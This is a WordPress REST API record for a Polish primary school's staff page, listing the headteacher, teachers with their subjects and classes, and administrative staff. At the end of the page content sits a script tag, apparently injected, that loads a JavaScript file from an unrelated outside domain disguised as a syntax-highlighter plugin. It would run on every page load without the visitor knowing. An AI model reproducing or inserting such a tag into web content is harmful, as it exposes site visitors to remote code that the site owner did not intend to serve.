{"id":42,"date":"2015-12-15T13:35:18","date_gmt":"2015-12-15T12:35:18","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=42"},"modified":"2020-12-22T00:07:21","modified_gmt":"2020-12-21T23:07:21","slug":"pracownicy-szkoly","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/pracownicy-szkoly\/","title":{"rendered":"Pracownicy szko\u0142y"},"content":{"rendered":"<table style=\"height: 94px;\" border=\"0\" width=\"806\">\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><span style=\"color: #000080;\"><strong>DYREKTOR SZKO\u0141Y<\/strong><\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><span style=\"color: #ff0000;\"><strong>mgr Barbara Nowak<br \/>\n<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table border=\"0\">\n<tbody>\n<tr>\n<td><span style=\"color: #008000;\"><strong>KADRA PEDAGOGICZNA<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><img loading=\"lazy\" class=\"wp-image-195 size-full aligncenter\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/0511-0703-2014-1738.jpg\" alt=\"0511-0703-2014-1738\" width=\"100\" height=\"80\" \/><\/p>\n<table style=\"height: 917px;\" border=\"0\" width=\"880\">\n<tbody>\n<tr>\n<td><span style=\"color: #000080;\"><strong>\u00a0\u00a0 L.p.<br \/>\n<\/strong><\/span><\/td>\n<td><span style=\"color: #000080;\"><strong>Imi\u0119 i nazwisko nauczyciela<\/strong><\/span><\/td>\n<td><span style=\"color: #000080;\"><strong>Nauczany przedmiot-wychowawstwo klasy<\/strong><\/span><\/td>\n<\/tr>\n<tr>\n<td><strong>1<\/strong><\/td>\n<td><strong>Renata Frycz<br \/>\n<\/strong><\/td>\n<td><strong>edukacja wczesnoszkolna &#8211; kl. O<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>2<\/strong><\/td>\n<td><strong>Magdalena Mision<br \/>\n<\/strong><\/td>\n<td><strong>logopeda, biblioteka<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>3<\/strong><\/td>\n<td><strong>Bernadetta Lesiak<\/strong><\/td>\n<td><strong>muzyka<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>4<\/strong><\/td>\n<td><strong>Marlena Plizga<br \/>\n<\/strong><\/td>\n<td><strong>rewalidacja, wychowanie do \u017cycia w rodzinie<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>5<\/strong><\/td>\n<td><strong>Beata Olesi\u0144ska-Hajdasz<br \/>\n<\/strong><\/td>\n<td><strong>historia, przyroda, geografia, \u015bwietlica, doradztwo zawodowe &#8211; kl.VII<br \/>\n<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>6<\/strong><\/td>\n<td><b>Barbara Bana\u015b<\/b><\/td>\n<td><strong>j.polski<br \/>\n<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>7<\/strong><\/td>\n<td><strong>Sebastian Grajaszek<br \/>\n<\/strong><\/td>\n<td><strong>matematyka, informatyka &#8211; kl.VI<br \/>\n<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>8<\/strong><\/td>\n<td><strong>Krystian Kuszczak<\/strong><\/td>\n<td><strong>j.angielski<br \/>\n<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>9<\/strong><\/td>\n<td><strong>Marcin Perzy\u0144ski<br \/>\n<\/strong><\/td>\n<td><strong>pedagog<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>10<\/strong><\/td>\n<td><strong>Alicja Szmajda<\/strong><\/td>\n<td><strong>religia &#8211; kl. VIII<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>11<\/strong><\/td>\n<td><strong>Edyta Mosso\u0144<br \/>\n<\/strong><\/td>\n<td><strong>wychowanie fizyczne, chemia, fizyka &#8211; kl. IV<br \/>\n<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>12<\/strong><\/td>\n<td><strong>Marcela Sznabel-Rudnicka<br \/>\n<\/strong><\/td>\n<td><strong>psycholog<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>13<\/strong><\/td>\n<td><strong>Krzysztof Serwin<br \/>\n<\/strong><\/td>\n<td><strong>szachy<br \/>\n<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>14<\/strong><\/td>\n<td><strong>Beata Syn\u00f3wka<br \/>\n<\/strong><\/td>\n<td><strong>wiedza o spo\u0142ecze\u0144stwie<br \/>\n<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>15<\/strong><\/td>\n<td><strong>Ma\u0142gorzata Zi\u0119ba<\/strong><\/td>\n<td><b>edukacja wczesnoszkolna &#8211; kl. III<\/b><\/td>\n<\/tr>\n<tr>\n<td><strong>14<\/strong><\/td>\n<td><strong>Martyna Subczy\u0144ska &#8211; Panna<\/strong><\/td>\n<td><strong>plastyka<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<strong>15<\/strong><\/td>\n<td><strong>\u00a0El\u017cbieta Ma\u0107ka\u0142a<\/strong><\/td>\n<td><b>j\u0119zyk polski<\/b><\/td>\n<\/tr>\n<tr>\n<td><strong>16<\/strong><\/td>\n<td><strong>Agnieszka \u017bydek<br \/>\n<\/strong><\/td>\n<td><strong>biologia, j\u0119zyk niemiecki, technika, \u015bwietlica &#8211; kl. V<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><img loading=\"lazy\" class=\"size-full wp-image-196 alignright\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2015\/12\/malarz2.gif\" alt=\"malarz2\" width=\"86\" height=\"73\" \/><\/p>\n<table style=\"height: 260px;\" border=\"0\" width=\"538\">\n<tbody>\n<tr>\n<td colspan=\"3\"><span style=\"color: #008000;\"><strong>PRACOWNICY OBS\u0141UGI I ADMINISTRACJI<\/strong><\/span><\/td>\n<\/tr>\n<tr>\n<td><strong>1<\/strong><\/td>\n<td><strong>Mariola Zawisza \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><strong>2<\/strong><\/td>\n<td><strong>Ewa J\u0119drusiak<\/strong><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><strong>3<\/strong><\/td>\n<td><strong>Wioleta Sw\u0119dzio\u0142<br \/>\n<\/strong><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><strong>4<\/strong><\/td>\n<td><strong>Teresa Filipowska<\/strong><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><strong>5<\/strong><\/td>\n<td><strong>Anna Kr\u00f3l<br \/>\n<\/strong><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><strong>6<\/strong><\/td>\n<td><strong>Marta Dani\u0142owicz<\/strong><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><strong>7<\/strong><\/td>\n<td><strong>Danuta Koza<\/strong><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><strong>8<\/strong><\/td>\n<td><strong>Zuzanna W\u0105s<\/strong><\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><strong>9<\/strong><\/td>\n<td><strong>Robert \u0141uczak <\/strong><\/td>\n<td><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>DYREKTOR SZKO\u0141Y mgr Barbara Nowak KADRA PEDAGOGICZNA \u00a0\u00a0 L.p. Imi\u0119 i nazwisko nauczyciela Nauczany przedmiot-wychowawstwo klasy 1 Renata Frycz edukacja wczesnoszkolna &#8211; kl. O 2 Magdalena Mision logopeda, biblioteka 3 Bernadetta Lesiak muzyka 4 Marlena Plizga rewalidacja, wychowanie do \u017cycia w rodzinie 5 Beata Olesi\u0144ska-Hajdasz historia, przyroda, geografia, \u015bwietlica, doradztwo zawodowe &#8211; kl.VII 6 Barbara [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/42"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=42"}],"version-history":[{"count":46,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/42\/revisions"}],"predecessor-version":[{"id":15851,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/42\/revisions\/15851"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=42"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}